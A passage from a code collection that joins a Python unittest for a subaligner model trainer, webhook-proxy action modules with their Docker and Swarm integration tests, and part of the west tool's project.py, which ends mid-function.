self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
False,
)
try:
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
True,
)
except Exception as e:
self.assertTrue(isinstance(e, AssertionError))
self.assertEqual("The existing model has been trained for 2 epochs. Make sure the total epochs are larger than 2", str(e))
else:
self.fail("Should have thrown exception")
def test_exception_on_resume_with_no_previous_training_log(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training_1.log".format(self.__resource_tmp),
False,
)
try:
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training_2.log".format(self.__resource_tmp),
True,
)
except Exception as e:
self.assertTrue(isinstance(e, AssertionError))
self.assertTrue("does not exist and is required by training resumption" in str(e))
else:
self.fail("Should have thrown exception")
def test_fit_with_generator(self):
self.__hyperparameters.epochs = 3
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) == self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) == self.__hyperparameters.epochs)
def test_early_stop_with_patience(self):
self.__hyperparameters.epochs = 3
self.__hyperparameters.es_patience = 0
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) < self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) < self.__hyperparameters.epochs)
def test_simple_fit(self):
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = Undertest.simple_fit(
(2, 20),
train_data,
labels,
self.__hyperparameters,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_simple_fit_with_generator(self):
self.__hyperparameters.epochs = 3
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = Undertest.simple_fit_with_generator(
(2, 20),
hf["train_data"],
hf["labels"],
self.__hyperparameters,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) == self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) == self.__hyperparameters.epochs)
@patch("tensorflow.keras.models.Model.fit", side_effect=KeyboardInterrupt)
def test_throw_exception_on_fit_and_get_history(self, mock_fit):
try:
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
except Exception as e:
self.assertTrue(mock_fit.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
@patch("tensorflow.keras.models.Model.fit", side_effect=KeyboardInterrupt)
def test_throw_exception_on_fit_with_generator(self, mock_fit):
self.__hyperparameters.epochs = 3
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
try:
network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
except Exception as e:
self.assertTrue(mock_fit.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
if __name__ == "__main__":
unittest.main()
``` |
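The fit, resume, and early-stopping tests above all assert that `val_loss` and `val_acc` come back as Python lists. That follows directly from how Keras reports metrics: `Model.fit()` returns a `History` object whose `history` dict holds one value per epoch. The sketch below is a minimal illustration with an arbitrary tiny LSTM and random data, not subaligner's own `Network` architecture.
```python
import numpy as np
from tensorflow.keras.layers import Dense, Input, LSTM
from tensorflow.keras.models import Model

# Arbitrary toy model with the same (2, 20) input shape used by the tests.
inputs = Input(shape=(2, 20))
outputs = Dense(1, activation="sigmoid")(LSTM(8)(inputs))
model = Model(inputs, outputs)
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

train_data = np.random.rand(64, 2, 20)
labels = np.random.randint(0, 2, size=(64, 1))
history = model.fit(train_data, labels, epochs=3, validation_split=0.25, verbose=0)

val_loss = history.history["val_loss"]       # list with one entry per epoch
val_acc = history.history["val_accuracy"]    # list with one entry per epoch
print(len(val_loss), len(val_acc))           # 3 3
```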
{
"source": "JohnVillalovos/webhook-proxy",
"score": 3
} |
#### File: src/actions/action_http.py
```python
import json
import requests
from actions import Action, action
@action("http")
class HttpAction(Action):
def __init__(
self,
target,
method="POST",
headers=None,
body=None,
json=False,
fail_on_error=False,
output="HTTP {{ response.status_code }} : {{ response.content }}",
):
self.target = target
self.method = method
self.headers = headers
self.body = body
self.json = json
self.fail_on_error = fail_on_error
self.output_format = output
def _run(self):
headers = self._headers.copy()
if self.body and "Content-Length" not in headers:
headers["Content-Length"] = str(len(self.body))
response = requests.request(
self.method, self._target, headers=headers, data=self._body
)
if self.fail_on_error and response.status_code // 100 != 2:
self.error("HTTP call failed (HTTP %d)" % response.status_code)
print(self._render_with_template(self.output_format, response=response))
@property
def _target(self):
return self._render_with_template(self.target)
@property
def _headers(self):
headers = dict()
if self.headers:
for name, value in self.headers.items():
headers[name] = self._render_with_template(value)
return headers
@property
def _body(self):
if self.body:
if self.json:
return self._render_json(self.body)
else:
return self._render_with_template(self.body)
else:
return self.body
def _render_json(self, body):
return json.dumps(self._render_json_item(body))
def _render_json_item(self, item):
if isinstance(item, dict):
rendered = {}
for key, value in item.items():
rendered[key] = self._render_json_item(value)
return rendered
if isinstance(item, list):
return [self._render_json_item(x) for x in item]
return self._render_with_template(item).strip()
```
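When `json: true` is set, the body is rendered recursively: every leaf value in nested dicts and lists goes through the template engine before the whole structure is dumped as JSON. The project's `_render_with_template` helper comes from the `Action` base class and is not shown in this dump; the sketch below reproduces the idea with plain Jinja2 so it can run on its own.
```python
import json

from jinja2 import Template


def render_item(item, **variables):
    # Mirrors the recursion in HttpAction._render_json_item: walk dicts and
    # lists, render leaf values as Jinja2 templates, and strip the result.
    if isinstance(item, dict):
        return {key: render_item(value, **variables) for key, value in item.items()}
    if isinstance(item, list):
        return [render_item(element, **variables) for element in item]
    return Template(str(item)).render(**variables).strip()


body = {"text": "Hello {{ name }}", "tags": ["{{ env }}", "webhook"]}
print(json.dumps(render_item(body, name="world", env="prod")))
# {"text": "Hello world", "tags": ["prod", "webhook"]}
```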
#### File: src/actions/action_sleep.py
```python
import time
from actions import Action, action
@action("sleep")
class SleepAction(Action):
def __init__(
self, seconds, output="Waiting {{ seconds }} seconds before continuing ..."
):
self.seconds = seconds
self.output_format = output
def _run(self):
seconds = float(self._render_with_template(str(self.seconds)))
print(self._render_with_template(self.output_format, seconds=seconds))
time.sleep(seconds)
```
#### File: webhook-proxy/tests/it_docker.py
```python
from integrationtest_helper import IntegrationTestBase
class DockerIntegrationTest(IntegrationTestBase):
def test_docker_info(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /info:
actions:
- docker:
$info:
output: 'version={{ result.ServerVersion }}'
"""
self.prepare_file("test-21.yml", config)
container = self.start_app_container("test-21.yml")
response = self.request("/info", data="none")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("version=%s" % self.DIND_VERSION, output)
def test_list_containers(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/list:
actions:
- docker:
$containers:
$list:
filters:
name: '{{ request.json.name }}'
output: |
{% for container in result %}
- {{ container.id }}
{% endfor %}
"""
self.prepare_file("test-22.yml", config)
container = self.start_app_container("test-22.yml")
response = self.request("/docker/list", name=container.name)
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertEqual(output.strip().splitlines()[-1], "- %s" % container.id)
def test_run_container(self):
self.prepare_images("alpine")
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /run:
actions:
- docker:
$containers:
$run:
image: alpine
command: 'echo "Alpine says: {{ request.json.message }}"'
remove: true
"""
self.prepare_file("test-23.yml", config)
container = self.start_app_container("test-23.yml")
response = self.request("/run", message="testing")
self.assertEqual(response.status_code, 200)
response = self.request("/run", message="sample")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("Alpine says: testing", output)
self.assertIn("Alpine says: sample", output)
def test_log_container_status(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /log/status:
actions:
- docker:
$containers:
$get:
container_id: '{{ request.json.target }}'
output: '{{ context.set("container", result) }}'
- log:
message: >
status={{ context.container.status }}
"""
self.prepare_file("test-24.yml", config)
container = self.start_app_container("test-24.yml")
response = self.request("/log/status", target=container.id)
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("status=running", output)
def test_restart_container(self):
self.prepare_images("alpine")
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/restart:
actions:
- docker:
$containers:
$run:
image: alpine
command: 'sh -c "echo \"{{ request.json.message }}\" && sleep 3600"'
detach: true
output: '{% set _ = context.set("target", result) %}'
- eval:
block: |
{{ context.target.restart(timeout=1) }}
{{ context.target.logs(stdout=true, stderr=false) }}
"""
self.prepare_file("test-25.yml", config)
container = self.start_app_container("test-25.yml")
response = self.request("/docker/restart", message="Starting...")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("Starting...\nStarting...", output)
```
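The `docker:` actions exercised above are thin wrappers over the Docker SDK for Python: the nested `$containers: $run:` keys map onto attribute and method lookups on the client. A rough, hedged equivalent of the `/run` endpoint's configuration, written directly against the SDK (and assuming a reachable local daemon with the `docker` package installed), looks like this:
```python
import docker

client = docker.from_env()

# Roughly what the `$containers: $run:` block does once the request template
# has been rendered; `remove=True` mirrors `remove: true` in the YAML.
output = client.containers.run(
    "alpine",
    command='echo "Alpine says: testing"',
    remove=True,
)
print(output.decode("utf-8").strip())  # Alpine says: testing
```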
#### File: webhook-proxy/tests/it_docker_swarm.py
```python
import time
from integrationtest_helper import IntegrationTestBase
def skip_below_version(version):
def decorator(f):
def wrapper(self, *args, **kwargs):
            if tuple(map(int, self.DIND_VERSION.split("."))) < tuple(map(int, version.split("."))):
self.skipTest(
reason="Skipping %s on version %s (< %s)"
% (f.__name__, self.DIND_VERSION, version)
)
else:
f(self, *args, **kwargs)
return wrapper
return decorator
class DockerSwarmIntegrationTest(IntegrationTestBase):
@classmethod
def setUpClass(cls):
super(DockerSwarmIntegrationTest, cls).setUpClass()
cls.prepare_images("alpine")
cls.dind_container.exec_run("docker swarm init")
def tearDown(self):
super(DockerSwarmIntegrationTest, self).tearDown()
for service in self.remote_client.services.list():
service.remove()
def test_list_services_using_docker_action(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/services/list:
actions:
- docker:
$services:
$list:
output: |
{% for service in result %}
s={{ service.name }}#{{ service.id }}
{% endfor %}
"""
self.prepare_file("test-41.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "date +%s ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.assertGreater(len(self.get_service_logs(service)), 0)
container = self.start_app_container("test-41.yml")
response = self.request("/docker/services/list", data="none")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("s=%s#%s" % (service.name, service.id), output)
@skip_below_version("1.13")
def test_restart_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/restart:
actions:
- docker-swarm:
$restart:
service_id: '{{ request.json.service }}'
"""
self.prepare_file("test-42.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
logs = self.get_service_logs(service)
self.assertEqual(logs.count("Starting"), 1)
self.start_app_container("test-42.yml")
response = self.request("/docker/swarm/restart", service="sample-app")
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
logs = self.get_service_logs(service)
self.assertEqual(logs.count("Starting"), 2)
def test_scale_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/scale:
actions:
- docker-swarm:
$scale:
service_id: '{{ request.json.service }}'
replicas: '{{ request.json.replicas }}'
"""
self.prepare_file("test-43.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.assertEqual(len(service.tasks()), 1)
self.start_app_container("test-43.yml")
response = self.request("/docker/swarm/scale", service="sample-app", replicas=2)
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
self.assertGreaterEqual(
len(service.tasks(filters={"desired-state": "running"})), 2
)
def test_update_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/update:
actions:
- docker-swarm:
$update:
service_id: '{{ request.json.service }}'
command: '{{ request.json.command }}'
labels:
label_1: 'sample'
label_2: '{{ request.json.label }}'
"""
self.prepare_file("test-44.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.start_app_container("test-44.yml")
response = self.request(
"/docker/swarm/update",
service="sample-app",
command='sh -c "echo "Updated" ; sleep 300"',
label="testing",
)
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
service.reload()
self.assertEqual(
service.attrs.get("Spec").get("Labels", dict()).get("label_1"), "sample"
)
self.assertEqual(
service.attrs.get("Spec").get("Labels", dict()).get("label_2"), "testing"
)
logs = self.get_service_logs(service)
self.assertIn("Starting", logs)
self.assertIn("Updated", logs)
@staticmethod
def wait_for_service_start(service, num_tasks, max_wait=30):
for _ in range(max_wait * 2):
if len(service.tasks()) >= num_tasks:
tasks_to_run = service.tasks(filters={"desired-state": "running"})
if len(tasks_to_run) > 0 and all(
task["Status"]["State"] == "running" for task in tasks_to_run
):
break
time.sleep(0.5)
def get_service_logs(self, service, stdout=True, stderr=False):
logs = list()
for container in self.remote_client.containers.list(
all=True, filters={"name": service.name}
):
logs.extend(
"".join(
char for char in container.logs(stdout=stdout, stderr=stderr)
).splitlines()
)
        return list(filter(len, map(lambda x: x.strip(), logs)))
```
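Likewise, the `docker-swarm:` actions correspond to service-level calls in the Docker SDK. The hedged sketch below shows direct SDK counterparts of the `$scale` and `$update` endpoints tested above; it assumes a daemon that already has swarm mode enabled (`docker swarm init`), which the test class arranges in `setUpClass`.
```python
import docker

client = docker.from_env()

service = client.services.create(
    "alpine", name="sample-app", command="sleep 3600", stop_grace_period=1
)
service.scale(2)                               # what the $scale action performs
service.update(labels={"label_1": "sample"})   # what the $update action performs
running = service.tasks(filters={"desired-state": "running"})
print(len(running))
service.remove()
```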
#### File: webhook-proxy/tests/it_import.py
```python
import os
from integrationtest_helper import IntegrationTestBase
class ImportIntegrationTest(IntegrationTestBase):
def test_import(self):
current_dir = os.path.dirname(__file__)
with open(os.path.join(current_dir, "imports/test1/action.py")) as action1:
self.prepare_file("extra_action_1.py", action1.read())
with open(os.path.join(current_dir, "imports/test2/action.py")) as action2:
self.prepare_file("extra_action_2.py", action2.read())
config = """
server:
host: 0.0.0.0
port: 9001
imports:
- /var/tmp/extra_action_1.py
- /var/tmp/extra_action_2.py
endpoints:
- /imports:
method: 'POST'
actions:
- test1:
action: test-1
- test2:
action: test-2
"""
self.prepare_file("test-61.yml", config)
container = self.start_app_container("test-61.yml")
response = self.request("/imports", test="test")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("action=test-1", output.strip())
self.assertIn("action=test-2", output.strip())
```
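The two modules copied in by this test (`imports/test1/action.py` and `imports/test2/action.py`) are not included in this dump. A hypothetical module that would satisfy the test, following the same `@action` registration pattern used by `action_http.py` and `action_sleep.py` above, could look like the following; the class and parameter names here are made up for illustration.
```python
from actions import Action, action


@action("test1")
class Test1Action(Action):
    def __init__(self, action):
        # Receives the `action: test-1` value from the endpoint configuration.
        self.action = action

    def _run(self):
        print("action=%s" % self.action)
```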
#### File: webhook-proxy/tests/test_docker_compose_action.py
```python
import os
import random
from unittest_helper import ActionTestBase
class DockerComposeActionTest(ActionTestBase):
def test_executions(self):
directory = "/tmp/compose_test_%s" % random.randint(1000, 9999)
os.makedirs(directory)
with open("%s/docker-compose.yml" % directory, "w") as composefile:
composefile.write(
"version: '2' \n"
"services: \n"
" cmps_one: \n"
" image: alpine \n"
" command: sleep 10 \n"
" stop_signal: KILL \n"
" cmps_two: \n"
" image: alpine \n"
" command: sleep 10 \n"
" stop_signal: KILL \n"
)
try:
output = self._invoke(
[
{
"docker-compose": {
"project_name": "testing",
"directory": directory,
"$up": {"detached": True},
"output": "Compose containers:\n"
"{% for container in result %}"
"-C- {{ container.name }}\n"
"{% endfor %}",
}
},
{
"docker-compose": {
"project_name": "testing",
"directory": directory,
"$down": {
"remove_image_type": False,
"include_volumes": True,
},
}
},
]
)
self.assertIn("-C- testing_cmps_one_1", output)
self.assertIn("-C- testing_cmps_two_1", output)
finally:
os.remove("%s/docker-compose.yml" % directory)
os.rmdir(directory)
``` |
{
"source": "JohnVillalovos/west",
"score": 2
} |
#### File: west/app/project.py
```python
import argparse
from functools import partial
import logging
import os
from os.path import abspath, relpath
from pathlib import PurePath, Path
import shutil
import shlex
import subprocess
import sys
import textwrap
from time import perf_counter
from typing import List
from urllib.parse import urlparse
from west.configuration import config, update_config
from west import log
from west import util
from west.commands import WestCommand, CommandError
from west.manifest import ImportFlag, Manifest, MANIFEST_PROJECT_INDEX, \
ManifestProject, _manifest_content_at, ManifestImportFailed, \
_ManifestImportDepth, ManifestVersionError, MalformedManifest
from west.manifest import is_group as is_project_group
from west.manifest import MANIFEST_REV_BRANCH as MANIFEST_REV
from west.manifest import QUAL_MANIFEST_REV_BRANCH as QUAL_MANIFEST_REV
from west.manifest import QUAL_REFS_WEST as QUAL_REFS
#
# Project-related or multi-repo commands, like "init", "update",
# "diff", etc.
#
class _ProjectCommand(WestCommand):
# Helper class which contains common code needed by various commands
# in this file.
def _parser(self, parser_adder, **kwargs):
# Create and return a "standard" parser.
kwargs['help'] = self.help
kwargs['description'] = self.description
kwargs['formatter_class'] = argparse.RawDescriptionHelpFormatter
return parser_adder.add_parser(self.name, **kwargs)
def _cloned_projects(self, args, only_active=False):
# Returns _projects(args.projects, only_cloned=True) if
# args.projects is not empty (i.e., explicitly given projects
# are required to be cloned). Otherwise, returns all cloned
# projects.
if args.projects:
ret = self._projects(args.projects, only_cloned=True)
else:
ret = [p for p in self.manifest.projects if p.is_cloned()]
if args.projects or not only_active:
return ret
return [p for p in ret if self.manifest.is_active(p)]
def _projects(self, ids, only_cloned=False):
try:
return self.manifest.get_projects(ids, only_cloned=only_cloned)
except ValueError as ve:
if len(ve.args) != 2:
raise # not directly raised by get_projects()
# Die with an error message on unknown or uncloned projects.
unknown, uncloned = ve.args
if unknown:
die_unknown(unknown)
elif only_cloned and uncloned:
s = 's' if len(uncloned) > 1 else ''
names = ' '.join(p.name for p in uncloned)
log.die(f'uncloned project{s}: {names}.\n'
' Hint: run "west update" and retry.')
else:
# Should never happen, but re-raise to fail fast and
# preserve a stack trace, to encourage a bug report.
raise
def _handle_failed(self, args, failed):
# Shared code for commands (like status, diff, update) that need
# to do the same thing to multiple projects, but collect
# and report errors if anything failed.
if not failed:
return
elif len(failed) < 20:
s = 's:' if len(failed) > 1 else ''
projects = ', '.join(f'{p.name}' for p in failed)
log.err(f'{self.name} failed for project{s} {projects}')
else:
log.err(f'{self.name} failed for multiple projects; see above')
raise CommandError(1)
def _setup_logging(self, args):
logger = logging.getLogger('west.manifest')
verbose = min(args.verbose, log.VERBOSE_EXTREME)
if verbose >= log.VERBOSE_NORMAL:
level = logging.DEBUG
else:
level = logging.INFO
logger.setLevel(level)
logger.addHandler(ProjectCommandLogHandler())
class Init(_ProjectCommand):
def __init__(self):
super().__init__(
'init',
'create a west workspace',
f'''\
Creates a west workspace.
With -l, creates a workspace around an existing local repository;
without -l, creates a workspace by cloning a manifest repository
by URL.
With -m, clones the repository at that URL and uses it as the
manifest repository. If --mr is not given, the remote's default
branch will be used, if it exists.
With neither, -m {MANIFEST_URL_DEFAULT} is assumed.
''',
requires_workspace=False)
def do_add_parser(self, parser_adder):
# We set a custom usage because there are two distinct ways
# to call this command, and the default usage generated by
# argparse doesn't make that very clear.
parser = self._parser(
parser_adder,
usage='''
%(prog)s [-m URL] [--mr REVISION] [--mf FILE] [directory]
%(prog)s -l [--mf FILE] directory
''')
# Remember to update the usage if you modify any arguments.
parser.add_argument('-m', '--manifest-url',
help='''manifest repository URL to clone;
cannot be combined with -l''')
parser.add_argument('--mr', '--manifest-rev', dest='manifest_rev',
help='''manifest revision to check out and use;
cannot be combined with -l''')
parser.add_argument('--mf', '--manifest-file', dest='manifest_file',
help='manifest file name to use')
parser.add_argument('-l', '--local', action='store_true',
help='''use "directory" as an existing local
manifest repository instead of cloning one from
MANIFEST_URL; .west is created next to "directory"
in this case, and manifest.path points at
"directory"''')
parser.add_argument(
'directory', nargs='?', default=None,
help='''with -l, the path to the local manifest repository;
without it, the directory to create the workspace in (defaulting
to the current working directory in this case)''')
return parser
def do_run(self, args, _):
if self.topdir:
zb = os.environ.get('ZEPHYR_BASE')
if zb:
msg = textwrap.dedent(f'''
Note:
In your environment, ZEPHYR_BASE is set to:
{zb}
This forces west to search for a workspace there.
Try unsetting ZEPHYR_BASE and re-running this command.''')
else:
msg = ''
self.die_already(self.topdir, msg)
if args.local and (args.manifest_url or args.manifest_rev):
log.die('-l cannot be combined with -m or --mr')
self.die_if_no_git()
self._setup_logging(args)
if args.local:
topdir = self.local(args)
else:
topdir = self.bootstrap(args)
log.banner(f'Initialized. Now run "west update" inside {topdir}.')
def die_already(self, where, also=None):
log.die(f'already initialized in {where}, aborting.{also or ""}')
def local(self, args) -> Path:
if args.manifest_rev is not None:
log.die('--mr cannot be used with -l')
# We need to resolve this to handle the case that args.directory
# is '.'. In that case, Path('.').parent is just Path('.') instead of
# Path('..').
#
# https://docs.python.org/3/library/pathlib.html#pathlib.PurePath.parent
manifest_dir = Path(args.directory or os.getcwd()).resolve()
manifest_filename = args.manifest_file or 'west.yml'
manifest_file = manifest_dir / manifest_filename
topdir = manifest_dir.parent
rel_manifest = manifest_dir.name
west_dir = topdir / WEST_DIR
if not manifest_file.is_file():
log.die(f'can\'t init: no {manifest_filename} found in '
f'{manifest_dir}')
log.banner('Initializing from existing manifest repository',
rel_manifest)
log.small_banner(f'Creating {west_dir} and local configuration file')
self.create(west_dir)
os.chdir(topdir)
update_config('manifest', 'path', os.fspath(rel_manifest))
update_config('manifest', 'file', manifest_filename, topdir=topdir)
return topdir
def bootstrap(self, args) -> Path:
topdir = Path(abspath(args.directory or os.getcwd()))
log.banner('Initializing in', topdir)
manifest_url = args.manifest_url or MANIFEST_URL_DEFAULT
if args.manifest_rev:
# This works with tags, too.
branch_opt = ['--branch', args.manifest_rev]
else:
branch_opt = []
west_dir = topdir / WEST_DIR
try:
already = util.west_topdir(topdir, fall_back=False)
self.die_already(already)
except util.WestNotFound:
pass
if not topdir.is_dir():
self.create(topdir, exist_ok=False)
# Clone the manifest repository into a temporary directory.
tempdir: Path = west_dir / 'manifest-tmp'
if tempdir.is_dir():
log.dbg('removing existing temporary manifest directory', tempdir)
shutil.rmtree(tempdir)
try:
log.small_banner(
f'Cloning manifest repository from {manifest_url}' +
(f', rev. {args.manifest_rev}' if args.manifest_rev else ''))
self.check_call(['git', 'clone'] + branch_opt +
[manifest_url, os.fspath(tempdir)])
except subprocess.CalledProcessError:
shutil.rmtree(tempdir, ignore_errors=True)
raise
# Verify the manifest file exists.
temp_manifest_filename = args.manifest_file or 'west.yml'
temp_manifest = tempdir / temp_manifest_filename
if not temp_manifest.is_file():
log.die(f'can\'t init: no {temp_manifest_filename} found in '
f'{tempdir}\n'
f' Hint: check --manifest-url={manifest_url}' +
(f' and --manifest-rev={args.manifest_rev}'
if args.manifest_rev else '') +
f' You may need to remove {west_dir} before retrying.')
# Parse the manifest to get the manifest path, if it declares one.
# Otherwise, use the URL. Ignore imports -- all we really
# want to know is if there's a "self: path:" or not.
projects = Manifest.from_file(temp_manifest,
import_flags=ImportFlag.IGNORE,
topdir=topdir).projects
manifest_project = projects[MANIFEST_PROJECT_INDEX]
if manifest_project.path:
manifest_path = manifest_project.path
else:
# We use PurePath() here in case manifest_url is a
# windows-style path. That does the right thing in that
# case, without affecting POSIX platforms, where PurePath
# is PurePosixPath.
manifest_path = PurePath(urlparse(manifest_url).path).name
manifest_abspath = topdir / manifest_path
log.dbg('moving', tempdir, 'to', manifest_abspath,
level=log.VERBOSE_EXTREME)
manifest_abspath.parent.mkdir(parents=True, exist_ok=True)
try:
shutil.move(os.fspath(tempdir), os.fspath(manifest_abspath))
except shutil.Error as e:
log.die(e)
log.small_banner('setting manifest.path to', manifest_path)
update_config('manifest', 'path', manifest_path, topdir=topdir)
update_config('manifest', 'file', temp_manifest_filename,
topdir=topdir)
return topdir
def create(self, directory: Path, exist_ok: bool = True) -> None:
try:
directory.mkdir(parents=True, exist_ok=exist_ok)
except PermissionError:
log.die(f'Cannot initialize in {directory}: permission denied')
except FileExistsError:
log.die(f'Cannot initialize in {directory}: it already exists')
except Exception as e:
log.die(f"Can't create {directory}: {e}")
class List(_ProjectCommand):
def __init__(self):
super().__init__(
'list',
'print information about projects',
textwrap.dedent('''\
Print information about projects in the west manifest,
using format strings.'''))
def do_add_parser(self, parser_adder):
default_fmt = '{name:12} {path:28} {revision:40} {url}'
parser = self._parser(
parser_adder,
epilog=f'''\
{ACTIVE_PROJECTS_HELP}
FORMAT STRINGS
--------------
Projects are listed using a Python 3 format string. Arguments
to the format string are accessed by name.
The default format string is:
"{default_fmt}"
The following arguments are available:
- name: project name in the manifest
- url: full remote URL as specified by the manifest
- path: the relative path to the project from the top level,
as specified in the manifest where applicable
- abspath: absolute and normalized path to the project
- posixpath: like abspath, but in posix style, that is, with '/'
as the separator character instead of '\\'
- revision: project's revision as it appears in the manifest
- sha: project's revision as a SHA. Note that use of this requires
that the project has been cloned.
- cloned: "cloned" if the project has been cloned, "not-cloned"
otherwise
- clone_depth: project clone depth if specified, "None" otherwise
- groups: project groups, as a comma-separated list
''')
parser.add_argument('-a', '--all', action='store_true',
help='include inactive projects'),
parser.add_argument('--manifest-path-from-yaml', action='store_true',
help='''print the manifest repository's path
according to the manifest file YAML, which may
disagree with the manifest.path configuration
option'''),
parser.add_argument('-f', '--format', default=default_fmt,
help='''format string to use to list each
project; see FORMAT STRINGS below.''')
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
see ACTIVE PROJECTS below''')
return parser
def do_run(self, args, user_args):
def sha_thunk(project):
self.die_if_no_git()
if not project.is_cloned():
log.die(f'cannot get sha for uncloned project {project.name}; '
f'run "west update {project.name}" and retry')
elif isinstance(project, ManifestProject):
return f'{"N/A":40}'
else:
return project.sha(MANIFEST_REV)
def cloned_thunk(project):
self.die_if_no_git()
return "cloned" if project.is_cloned() else "not-cloned"
def delay(func, project):
return DelayFormat(partial(func, project))
self._setup_logging(args)
for project in self._projects(args.projects):
# Skip inactive projects unless the user said
# --all or named some projects explicitly.
if not (args.all or args.projects or
self.manifest.is_active(project)):
log.dbg(f'{project.name}: skipping inactive project')
continue
# Spelling out the format keys explicitly here gives us
# future-proofing if the internal Project representation
# ever changes.
#
# Using DelayFormat delays computing derived values, such
# as SHAs, unless they are specifically requested, and then
# ensures they are only computed once.
try:
if (isinstance(project, ManifestProject) and not
args.manifest_path_from_yaml):
# Special-case the manifest repository while it's
# still showing up in the 'projects' list. Yet
# more evidence we should tackle #327.
path = config.get('manifest', 'path')
apath = abspath(os.path.join(self.topdir, path))
ppath = Path(apath).as_posix()
else:
path = project.path
apath = project.abspath
ppath = project.posixpath
result = args.format.format(
name=project.name,
url=project.url or 'N/A',
path=path,
abspath=apath,
posixpath=ppath,
revision=project.revision or 'N/A',
clone_depth=project.clone_depth or "None",
cloned=delay(cloned_thunk, project),
sha=delay(sha_thunk, project),
groups=','.join(project.groups))
except KeyError as e:
# The raised KeyError seems to just put the first
